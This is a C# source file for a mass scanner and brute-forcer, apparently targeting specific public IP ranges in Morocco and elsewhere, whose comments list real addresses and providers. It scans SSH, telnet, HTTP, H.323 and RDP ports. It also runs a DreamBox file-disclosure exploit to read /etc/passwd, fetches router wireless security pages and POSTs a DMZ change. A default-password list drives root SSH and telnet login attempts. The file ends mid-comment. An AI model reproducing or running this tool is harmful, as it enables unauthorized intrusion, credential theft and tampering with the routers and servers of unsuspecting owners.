using System;
using System.Collections;   //ArrayList
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;

using System.Net.Sockets;
using System.Net;

using Tamir.SharpSsh;

//TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
//JA
namespace sshbruteforcer
{
    public static class IPAddressMask
    {
        private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
        {
            if (mask == null)
            {
                throw new ArgumentException();
            }

            addressBytes = ipAddress.GetAddressBytes();
            maskBytes = mask.GetAddressBytes();

            if (addressBytes.Length != maskBytes.Length)
            {
                throw new ArgumentException("The address and mask don't use the same IP standard");
            }
        }

        public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
        {
            byte[] addressBytes;
            byte[] maskBytes;
            CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);

            byte[] resultBytes = new byte[addressBytes.Length];
            for (int i = 0; i < addressBytes.Length; ++i)
            {
                resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
            }

            return new IPAddress(resultBytes);
        }

        private static IPAddress empty = IPAddress.Parse("0.0.0.0");
        private static IPAddress intranetMask1 = IPAddress.Parse("10.255.255.255");
        private static IPAddress intranetMask2 = IPAddress.Parse("172.16.0.0");
        private static IPAddress intranetMask3 = IPAddress.Parse("172.31.255.255");
        private static IPAddress intranetMask4 = IPAddress.Parse("192.168.255.255");
        /// <summary>
        /// Retuns true if the ip address is one of the following
        /// IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
        ///  Start 	      End 	
        ///  10.0.0.0 	    10.255.255.255 	
        ///  172.16.0.0 	  172.31.255.255 	
        ///  192.168.0.0   192.168.255.255 
        /// </summary>
        /// <returns></returns>
        public static bool IsOnIntranet(this IPAddress ipAddress)
        {
            if (empty.Equals(ipAddress))
            {
                return false;
            }
            bool onIntranet = IPAddress.IsLoopback(ipAddress);
            onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask1)); //10.255.255.255
            onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask4)); ////192.168.255.255

            onIntranet = onIntranet || (intranetMask2.Equals(ipAddress.And(intranetMask2))
              && ipAddress.Equals(ipAddress.And(intranetMask3)));

            return onIntranet;
        }
    }

    public class Program    //(string ipaddress)
    {
    //    public Socket Sock_scan;
        

        static Byte[] m_byBuff = new Byte[32767];

        int Max_thread=50;
        
        private static AsyncCallback callbackProc ;
        private static ArrayList m_ListOptions = new ArrayList();
        static Char IAC = Convert.ToChar(255);
        static Char DO = Convert.ToChar(253);
        static Char DONT = Convert.ToChar(254);
        static Char WILL = Convert.ToChar(251);
        static Char WONT = Convert.ToChar(252);
        static Char SB = Convert.ToChar(250);
        static Char SE = Convert.ToChar(240);

        // ManualResetEvent instances signal completion.
        private static ManualResetEvent connectDone =
            new ManualResetEvent(false);
        private static ManualResetEvent sendDone =
            new ManualResetEvent(false);
        private static ManualResetEvent receiveDone =
            new ManualResetEvent(false);
        // The response from the remote device.
        private static String response = String.Empty;

        public static Compteur_thread cpt_th = new Compteur_thread();

        


        string ipaddress;
        int portx;

            //public static IPAddress address = IPAddress.Parse("10.20.10.5");
            //bool onTheIntranet = address.IsOnIntranet();
        

        public Program(string ipaddress, int portx)
        {
            this.ipaddress = ipaddress;
            this.portx = portx;
            //this.cpt_th = new Compteur_thread();
        }

        public static void Main(string[] args)
        {
            Program p1 = new Program("go",5);
            //p1.go();
            Thread th_Scan_ip_port = new Thread(new ThreadStart(p1.go));
            th_Scan_ip_port.Start();
        }

        public void go()
        {
        //    CScanner_IP s;
        //    s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
 

            byte[] t_IP_start;
            byte[] t_IP_end;

       //     IPAddress MyExternalIp = GetExternalIp();
       //     Console.WriteLine("MyExternalIp=" + MyExternalIp);
       //     string[] s_ip = MyExternalIp.ToString().Split('.');
       //     string[] s2_ip = MyExternalIp.ToString().Split('.');

            string adresse_en_cours;
            

            int Port_start=22;
            int Port_end=23;

            


            Thread th_Lance_Scan;
		    Thread th_Scan_ip_port;

            
            cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);

            //Decoupe IP debut
            //196.28.249.---    Burkina Faso
            //41.202.193.---    Cameroun
            //195.24.206.---    Cameroun
            //90.4.125.---      France
            //202.152.43.---    Indonésie
            //202.159.126.---   Indonésie

            //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
    
            //41.214
            string[] s_ip = { "41", "141", "1", "1" };    //zawi    41.250.195.107 
    //string[] s_ip={"41", "250", "75", "1"};    //zawi    41.250.195.107  
    //string[] s_ip = { "81", "192", "102", "1" };  //Maroc telecom ip fixe   81.192.102.8: netpeas     81.192.152.205: cnia
            //41.248.0
            //41.248.158.92
            //string[] s_ip = { "41", "141", "235", "1" };    //example:  41.141.235.82
            //41.141.55.16  Agadir
            //41.143.11.192
            //41.250.59.57
            //41.250.118.53
            //41.250.129.142
            //string[] s_ip = { "41", "250", "82", "159" };    //example:   41.250.82.159
    //        string[] s_ip = { "196", "12", "232", "1" };       //196.12.232.120 <snip> location
            //196.206.198.10    Rabat
            //string[] s_ip = { "41", "250", "136", "1" };    //<snip> location   41.250.136.238
            //string[] s_ip = { "41", "250", "150", "18" }; 
            //string[] s_ip = { "41", "250", "195", "1"};    //zawi    41.250.195.107
            //string[] s_ip = { "41", "251", "16", "1" };    //<snip> location   41.251.16.238
            //string[] s_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
            //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
            //string[] s_ip = { "196", "217", "240", "1" };    //MENARA (mail)
            //string[] s_ip = { "81", "192", "48", "1" };    //MENARA (dns)
            //string[] s_ip = { "212", "217", "0", "1" };    //MENARA
            
            t_IP_start = new byte[4];
       //     for (int i = 0; i < s_ip.Length; i++)
       //         t_IP_start[i] = Convert.ToByte(s_ip[i]);
            t_IP_start[0] = Convert.ToByte(s_ip[0]);
            t_IP_start[1] = Convert.ToByte(s_ip[1]);
            t_IP_start[2] = Convert.ToByte(s_ip[2]);
            t_IP_start[3] = Convert.ToByte(s_ip[3]);
            //t_IP_start[3] = Convert.ToByte("1");

            //string[] s2_ip={"41", "250", "149", "254"}; //zawi
//    string[] s2_ip={"41", "251", "254", "254"}; //zawi
          string[] s2_ip = { "196", "12", "233", "255" };       //196.12.232.120 <snip> location
            //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location     41.251.35.72
            //string[] s2_ip = { "41", "141", "235", "254" };    //<snip> location  41.141.235.82
            //string[] s2_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
//            string[] s2_ip = { "41", "250", "150", "19" };
            //string[] s2_ip = { "196", "217", "255", "255" };    //MENARA (mail)
            //string[] s2_ip = { "81", "192", "63", "255" };    //MENARA (dns)
            //string[] s2_ip = { "212", "217", "31", "255" };    //MENARA
            
            t_IP_end = new byte[4];
       //     for (int i = 0; i < s_ip.Length; i++)
       //         t_IP_end[i] = Convert.ToByte(s2_ip[i]);
            t_IP_end[0] = Convert.ToByte(s2_ip[0]);
            t_IP_end[1] = Convert.ToByte(s2_ip[1]);
            t_IP_end[2] = Convert.ToByte(s2_ip[2]);
            t_IP_end[3] = Convert.ToByte(s2_ip[3]);
            //t_IP_end[3] = Convert.ToByte("255");

//          private void Lancer_Scan()
//		    {
			    int i=0, j=0, k=0, l=0;
			    int max_j=0, max_k=0, max_l=0;
			    bool start_j = true;
			    bool start_k = true;
			    bool start_l = true;
		
			    try
			    {

				//    Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
                    //Console.WriteLine("Debut du scan");
//				    if(init_scan != null)init_scan(this, infs);

				    for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
				    {
					    if((start_j) && (t_IP_start[0] != t_IP_end[0]))
					    {
						    j = t_IP_start[1];
						    max_j = 255;
					    }
					    if((start_j) && (t_IP_start[0] == t_IP_end[0]))
					    {
						    j = t_IP_start[1];
						    max_j = t_IP_end[1];
					    }

					    if((!start_j) && (i != t_IP_end[0]))
					    {
						    j = 0;
						    max_j = 255;
					    }
					    if((!start_j) && (i == t_IP_end[0]))
					    {
						    j = 0;
						    max_j = t_IP_end[1];
					    }

					    for( ;j <= max_j; j++)
					    {

						    if((start_k) && (t_IP_start[1] != t_IP_end[1]))
						    {
							    k = t_IP_start[2];
							    max_k = 255;
						    }
						    if((start_k) && (t_IP_start[1] == t_IP_end[1]))
						    {
							    k = t_IP_start[2];
							    max_k = t_IP_end[2];
						    }

						    if((!start_k) && (j != t_IP_end[1]))
						    {
							    k = 0;
							    max_k = 255;
						    }
						    if((!start_k) && (j == t_IP_end[1]))
						    {
							    k = 0;
							    max_k = t_IP_end[2];
						    }

						    for( ;k <= max_k; k++)
						    {

							    if((start_l) && (t_IP_start[2] != t_IP_end[2]))
							    {
								    l = t_IP_start[3];
								    max_l = 255;
							    }
							    if((start_l) && (t_IP_start[2] == t_IP_end[2]))
							    {
								    l = t_IP_start[3];
								    max_l = t_IP_end[3];
							    }

							    if((!start_l) && (k != t_IP_end[2]))
							    {
								    l = 0;
								    max_l = 255;
							    }
							    if((!start_l) && (k == t_IP_end[2]))
							    {
								    l = 0;
								    max_l = t_IP_end[3];
							    }

							    for( ;l <= max_l; l++)
							    {
								    adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
								
								//    Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
                                //    Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
								
								//    if(debut_scan != null)
								//	    debut_scan(this, info);
								
/*
								    Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
*/
                                    int nb_thread = 0;
                                    for (int port = Port_start; port <= Port_end; port++)
                                    {
                                        /*
                                        Scanner_IP_Port(adresse_en_cours, port);
                                        th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
                                        th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
                                        th_Scan_ip_port.Start();
                                        */

                                        Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);

                                        Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
                                        t.Start();

                                        cpt_th.Incrementer();
                                        nb_thread = 0;
                                        cpt_th.Nb_thread(out nb_thread);
                                        if (nb_thread == this.Max_thread)
                                        {
                                            lock (this)
                                            {
                                            //    Console.WriteLine("DEBUG WAIT1");
                                                Monitor.Wait(this);                                                
                                            }
                                        }
                                    }

                                    //http scan
                                    
                                    Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);

                                    Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
                                    t2.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                        //    Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    

                                    //https scan
                                    
                                    Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);

                                    Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
                                    t3.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }

                                    //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
                                    Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);

                                    Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
                                    t1720.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    

                                    //RDP scan
                                    Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);

                                    Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
                                    t3389.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    
/*
								    sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
								    th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
								    th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
								    th_Scan_ip_port.Start();						
								
								    cpt_th.Incrementer();
								    int nb_thread = 0;
								    cpt_th.Nb_thread(out nb_thread);
*/

    /*							
								    if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
								    {
									    Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
									    if(this.maj_prg_bar != null)
										    this.maj_prg_bar(this, ifs);

									    this.pas_a_atteindre += this.pas_progress;
								    }

								    i_progress++;
    */
								    
/*                                    
                                    if(nb_thread == this.Max_thread)
								    {
									    lock(this)
									    {
										    Monitor.Wait(this);
									    }

									    if(this.ARRETER_SCAN)
									    {
										    Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
										    if(fin_scan != null)fin_scan(this, inf_s);

										    return;                                        
									    }
								    }
*/
							    }
							    start_l = false;
						    }
						    start_k = false;
					    }
					    start_j = false;
				    }

				//    Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
				//    if(fin_scan != null)fin_scan(this, inf);
			    }
			    catch(Exception e)
			    {
				    Console.WriteLine("BADBOY: "+e.ToString());
			    }
//		    }

            



        }

        public class Scanner_ip_port
        {
            string adresse_ip;
            int port;

            Compteur_thread cpt_th;




            public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
            {
                this.adresse_ip = adresse_ip;
                this.port = port;
                this.cpt_th = cpt_th;
            }

            public void Scanner_IP_Port()
            {
                try
                {
                //    Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());

                    IPAddress adresseIP = IPAddress.Parse(adresse_ip);
                    IPEndPoint ip = new IPEndPoint(adresseIP, port);
                    Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    //Sock_scan.Blocking = false;
                    // Connect to the remote endpoint.
                    Sock_scan.Connect(ip);
               /*asynchronous     
                    try
                    {
                        Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
                    }
                    catch (Exception e)
                    {
                        Console.WriteLine("DEBUG BEGINCONNECT: "+e);
                    }
                    Console.WriteLine("DEBUG RACHEL");
                    connectDone.WaitOne(1000);
               asynchronous*/

                    //    Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
                    Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
                    //    if (scan_en_cours != null) scan_en_cours(this, info);


                    /*
                    Byte[] RecvBytes = new Byte[256];
                    String strRetPage = null;
                    Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                    Encoding ASCII = Encoding.ASCII;
                    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

                    while (bytes > 0)
                    {
                        bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                        strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
                    }
                    Console.WriteLine(strRetPage);
                    */
                    byte[] data = new byte[4096];
                    string banner;
                    int recv;
                    /*
                    NetworkStream ns = new NetworkStream(Sock_scan);
                    if (ns.CanRead)
                    {
                        recv = ns.Read(data, 0, data.Length);
                        stringData = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("== BANNER START =======================");
                        Console.WriteLine(stringData);
                        Console.WriteLine("== BANNER END =======================");
                    }
                    else
                    {
                        Console.WriteLine("Error: Can't read from this socket");
                        ns.Close();
                    //    server.Close();
                    //    return;
                    }
                    */

                    // Receive the response from the remote device.
                    /*synchro*/
                    recv = Sock_scan.Receive(data);
                    banner = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);

                    if (banner == "")
                    {
                        recv = Sock_scan.Receive(data);
                        banner = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
                    }

                    /*synchro*/

                    /*asynchro
                    Receive(Sock_scan);
                    receiveDone.WaitOne(1000);
                    // Write the response to the console.
                    Console.WriteLine("Response received : {0}", response);
                        banner = response;
                    asynchro*/




                                        
                    

                    if (port == 21)
                    {
                        Sock_scan.Close();
                    //    ftptry(adresse_ip);              
                    }
                    if (port == 22)
                    {
                        Sock_scan.Close();
                    //   sshtry(adresse_ip);
                    }
                    if (port == 23)
                    {
                        if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
                        {

                        }
                        else
                        {
                            recv = Sock_scan.Receive(data);
                            banner = Encoding.ASCII.GetString(data, 0, recv);
                            Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
                            if (banner.Contains("ogin:") || banner.Contains("assword:"))
                            {

                            }
                            else
                            {
                                recv = Sock_scan.Receive(data);
                                banner = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
                            }
                        }
                        Sock_scan.Close();
                        if (banner.Contains("Connection was denied by remote host according to ACL!"))
                        {

                        }
                        else
                        {
                            telnettry(adresse_ip, banner);
                        }
                    }
                    if (port == 80)
                    {
                        string ResponseText = "";
                        StreamReader SR = null;
                        HttpWebResponse response = null;
                        HttpWebRequest request;
                        request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));

                        //***********************************************************************************************************************************************
                        //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
                        //http://www.exploit-db.com/exploits/18079/
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));

                        
                        //***********************************************************************************************************************************************
                        //108M Wireless ADSL2+ Router
                        //http://41.250.9.119/wlcfg.html   //Wireless/Basic
                        //http://41.250.9.119/wlsecurity.html   //Wireless/Security

                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
                        //***********************************************************************************************************************************************
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
                        //***********************************************************************************************************************************************
                        //http://41.250.9.119/scdmz.html    //DMZ
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2");    //dmzAddr
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "POST";
                        //request.ContentType = "application/xml";

                        string postData = "address=192.168.1.2";
                        byte[] byteArray = Encoding.UTF8.GetBytes(postData);
                        request.ContentLength = byteArray.Length;

                        Stream dataStream = request.GetRequestStream();
                        dataStream.Write(byteArray, 0, byteArray.Length);
                        dataStream.Close();

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
                        

                    }

                    cpt_th.Decrementer();

                    //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
                }
                catch (Exception e)
                {
                    /*
                        Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
                        if (scan_en_cours != null) scan_en_cours(this, info);                        
                    */
                    cpt_th.Decrementer();
                //    Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
                //    Console.WriteLine("EXCEPT: " + e);
                }
            }
        }

        static List<string> passwords = new List<string>
        {
            "admin",
            "1234",
            "cisco",
            "",
            "Admin",
            "root",
            "toor",
            "default",
            "azerty",
            "qwerty",
            "12345",
            "123456",
            "1234567",
            "12345678",
            "dreambox",
            "test",
            "user",
            "demo",
            "ZXDSL",
            "password",
            "agadir",
            "menara",
            "Menara",
            "maroc",
            "vodafone",
            "epicrouter",    //conexant telnet
            //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
            "abc123",
            "monkey",
            "letmein",
            "trustno1",
            "dragon",
            "baseball",
            "111111",
            "iloveyou",
            "master",
            "sunshine",
            "ashley",
            "bailey",
            "passw0rd",
            "shadow",
            "123123",
            "654321",
            "superman",
            "qazwsx",
            "michael",
            "football"
            //123123
        };

        public static void sshtry(string myip)
        {
            Console.WriteLine("sshtry");
        //    sshtry("test");         
            foreach (string password in passwords)
            {
                try
                {
                    Console.Write("-Connecting...");
                    SshStream ssh = new SshStream(myip, "root", password);
                    Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
                    Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
                    Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
                    Console.WriteLine("-Use the 'exit' command to disconnect.");
                    Console.WriteLine();

                    //Sets the end of response character
                    ssh.Prompt = "#";
                    //Remove terminal emulation characters
                    ssh.RemoveTerminalEmulationCharacters = true;

                    //Reads the initial response from the SSH stream
                    //    Console.Write(ssh.ReadResponse());



                    ////Send commands from the user
                    //while (true)
                    //{
                    //    string command = Console.ReadLine();
                    //    if (command.ToLower().Equals("exit"))
                    //        break;

                    //    //Write command to the SSH stream
                    //    ssh.Write(command);
                    //    //Read response from the SSH stream
                    //    Console.Write(ssh.ReadResponse());
                    //}
                    ssh.Close(); //Close the connection
                    Console.WriteLine("Connection closed.");
                }
                catch (Exception e)
                {
                    string response = string.Empty;
                    response = e.Message;
                    if (response == "Auth fail")
                    {
                        Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
                    //    sshtry("12345");
                    }
                    else
                    {
                        Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
                    }
                }
            }
        }

        public static void telnettry(string myip, string banner)
        {
            Console.WriteLine("telnettry");

            Socket Sock_scan;

            byte[] data = new byte[1024];
            string stringdata="";
            int recv;

            //try
            //{
                
                IPAddress adresseIP = IPAddress.Parse(myip);
                IPEndPoint ip = new IPEndPoint(adresseIP, 23);
//                Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                //Sock_scan.Blocking = false; // This is a non blocking IO
                
                /*
                // Assign Callback function to read from Asyncronous Socket
                callbackProc = new AsyncCallback(ConnectCallback);
                // Begin Asyncronous Connection
                Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
                */

//                Sock_scan.Connect(ip);
                //recv = Sock_scan.Receive(data);
                //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
            
            //}
            //catch (Exception eeeee)
            //{
            //    Console.WriteLine(eeeee.Message);
            //}            

            String strRetPage = null;
            Int32 bytes;            
            Byte[] RecvBytes = new Byte[256];
            Encoding ASCII = Encoding.ASCII;
            /*
            bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
            
            strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

            while (bytes > 0)
            {
                bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
            }
            Console.WriteLine("Banner telnet: " + strRetPage);
            */

            if (banner.Contains("ogin:") || banner.Contains("sername:"))
            {
                Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                Sock_scan.Connect(ip);

                recv = Sock_scan.Receive(data);
                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);

                #region BANNERS01
                //Exemple: Vulcan
                //<BAD SEQUENCE>
                //Copyright (c) 2001-2003 by Conexant, Inc.

                //login: 01
                //password:
                //Echec Login
                //login:
                //login: 02
                //password:
                //Echec Login
                //login: 03
                //password:
                //Echec Login
                //login:
                //login: 04
                //password:
                //Echec Login
                //login: 05
                //password:
                //Echec Login


                //Perte de la connexion à l'hôte.
                //</BAD SEQUENCE>

                //************************************************************************************
                //                           CONEXANT SYSTEMS, INC.
                //   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //LOGON PASSWORD>
                //(epicrouter)
                //
                //
                //                                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21


                //                                   MAIN MENU

                //                        0. Select VC Adaptor
                //                        1. Display Firmware Version
                //                        2. Password Setup
                //                        3. Connection Status
                //                        4. Network Setup
                //                        5. ADSL Setup
                //                        6. System Maintenance




                //                        S. Save Settings and Reset Unit
                //                        R. Reset Without Saving Changes
                //                        Q. Quit Session

                //                        Enter your selection below:

                //>>>
                //(2)
                //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                              Password Setup


            //                        1. Change Administrative Password
            //                        2. Change PPP User Name and Password
            //                        3. Change User Password








            //                              Press 'B' to go Back
            //                          Press 'M' to go to Main Menu
            //                           Enter your selection below



            //>>>

            //(1)
            //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                       Change Administrative Password


            //                        Enter New Admin Password:
            //              (no less than 8 characters, '&' is not accepted)
            //                              (Press ESC to quit)

            //>>>
            //
            //                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //                       Confirm Administrative Password


                //                        Re-enter New Admin Password:
                //              (no less than 8 characters, '&' is not accepted)
                //                              (Press ESC to quit)

                //>>>

            //                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //                              Password Setup


                //                        1. Change Administrative Password
                //                        2. Change PPP User Name and Password
                //                        3. Change User Password

                //                              Press 'B' to go Back
                //                          Press 'M' to go to Main Menu
                //                           Enter your selection below



                //>>>


                //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                                     Quit Session


            //                        This will quit current telnet session.


            //                     Press 'Y' to continue, or 'B' to go back.
            //                             Press 'M' for main menu.


            //>>>



                //************************************************************************************
                //NetDVRDVS:admin
                //Password:
                //Login incorrect


                //************************************************************************************
                //User Access Verification

                //Username: admin
                //Password:
                //% Login invalid


                //************************************************************************************
                //(212.217.28.244)
